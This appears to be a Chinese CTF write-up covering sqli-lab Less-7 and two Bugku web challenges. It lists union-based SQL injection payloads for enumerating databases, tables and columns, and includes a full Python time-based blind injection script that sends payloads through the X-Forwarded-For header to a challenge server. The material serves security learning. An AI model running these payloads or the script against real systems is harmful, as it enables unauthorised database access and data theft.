sqli-lab题解
sqli-lab/Less-7----确定闭合字符
确定引号类型
?id=1--+ ?id=1'--+ ?id=1"--+确定括号
?id=1'--+ ?id=1')--+ ?id=1'))--+ ...
mysql查看log
https://blog.csdn.net/sinat_15955423/article/details/90907993bugku-成绩单
order by 数字/字段名,加上回显,确定字段数
group_concat 多项结果合并成一项
sql支持16进制编码代替字符
id=1' order by 1# 1' 闭合 order by 排序 1 排序字段(这里指第1列) # 注释掉后面的sql语句 回显验证 id=-1' union select 1,2,3,4# 报database名字 id=-1' union select 1,2,3,database()# 报table名字 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 报column名字 id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制绕过 报数据 id=-1' union select 1,2,3,skctf_flag from fl4g#
爆database,table,column,参考https://www.cnblogs.com/Eleven-Liu/p/9712576.html
子查询一定要加()
bugku-insert注入
时间盲注,根据等待时间暴力匹配
#insert into client_ip (ip) values ('$ip')
import requests
import re
import string
chst=string.printable#可打印字符集
sql="1' and %s and SLEEP(3) )#"
# 1' 闭合'$ip'
# and 表达式短路
# %s 填入命令
# SLEEP(3) 停止3s
# ) 闭合('$ip')
# # 注释
chk_substr="(SUBSTR(%s from %d for 1)='%c')"
chk_len="(LENGTH(%s)=%d)"
str1="(select group_concat(schema_name) from information_schema.schemata)"#爆db
str2="(select group_concat(table_name) from information_schema.tables \
where table_schema='web15')"#爆tb
str3="(select group_concat(column_name) from information_schema.columns \
where table_schema='web15' and table_name='flag')"#爆col
str4="(select group_concat(flag) from web15.flag)"#爆data
str5="(select * from web15.flag)"
def chk(cmd):
try:
hd={'x-forwarded-for':cmd}
r0=requests.get('http://123.206.87.240:8002/web15/',headers=hd,timeout=2)
#print(r0.text)
return 0
except:
return 1
def hex_str(cmd):#16进制绕过
return "0x"+''.join([hex(ord(i))[2:] for i in cmd])
def chk_table_exist(tb_name):#判断表是否存在
str4=sql % ("exists(select * from %s)" % tb_name)
if(chk(str4)):print("%s exists"%tb_name)
else:print("%s not exists"%tb_name)
def find_len(patn):#获取查询字段长度
for i in range(1,200):
cmd=sql % str(chk_len % (patn,i))
if(chk(cmd)):print("success,len="+str(i));return i
print("find_db_name_len() fail");return -1
def find_name(patn):#获取查询字段
tb_len=find_len(patn)
name=""
for i in range(1,tb_len+1):
#print("try %dth ch"%i)
for ch in chst:
cmd=sql%(chk_substr % (patn,i,ch))
if(chk(cmd)):
name=name+(ch)
#print(name)
break
return name
print(find_name(str1))#information_schema,web15
print(find_name(str2))#client_ip,flag
print(find_name(str3))#flag
print(find_name(str4))
京公网安备 11010502036488号